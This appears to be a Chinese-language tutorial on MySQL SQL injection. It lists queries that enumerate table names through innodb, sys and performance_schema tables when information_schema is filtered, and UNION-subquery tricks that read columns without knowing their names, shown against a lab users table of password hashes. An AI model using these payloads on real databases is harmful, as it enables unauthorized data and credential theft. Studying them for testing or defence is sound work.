Skip to content

SQL注入限制条件下获取表名&无列名注入

获取表名

innodb存储引擎

Mysql>5.6.x 对于waf掉information_schema,可以利用innodb_table_statsinnodb_table_stats两个表来查询到 但是mysql默认是关闭InnoDB存储引擎的 

select table_name from mysql.innodb_table_stats where database_name = database();
select table_name from mysql.innodb_index_stats where database_name = database();

sys

在MySQL 5.7.9中sys中新增了一些视图,可以从中获取表名 

//包含in
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();

//不包含in
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();

//通过表文件的存储路径获取表名
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
包含之前查询记录的表 
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
performance_schema 
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
包含之前查询记录的表 
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
包含表文件路径的表 
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();

无列名注入

利用join进行无列名注入

select 1,2,3,4 union select * from users;

1 2 3 4
1 2 3 4
1 admin e10adc3949ba59abbe56e057f20f883e 1
2 pikachu 670b14728ad9902aecba32e22fa4f6bd 2
3 test e99a18c428cb38d5f260853678922e03 3

select `3` from (select 1,2,3,4 union select * from users)a;

3
3
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03

如果```被过滤,使用别名来代替:

select b from (select 1,2 as b,3,4 as c union select * from users)a;

b
2
admin
pikachu
test

同时查询多个列:

select concat(b,0x2d,c) from (select 1,2 as b,3 as c,4 union select * from users)a;

concat(b,0x2d,c)
2-3
admin-e10adc3949ba59abbe56e057f20f883e
pikachu-670b14728ad9902aecba32e22fa4f6bd
test-e99a18c428cb38d5f260853678922e03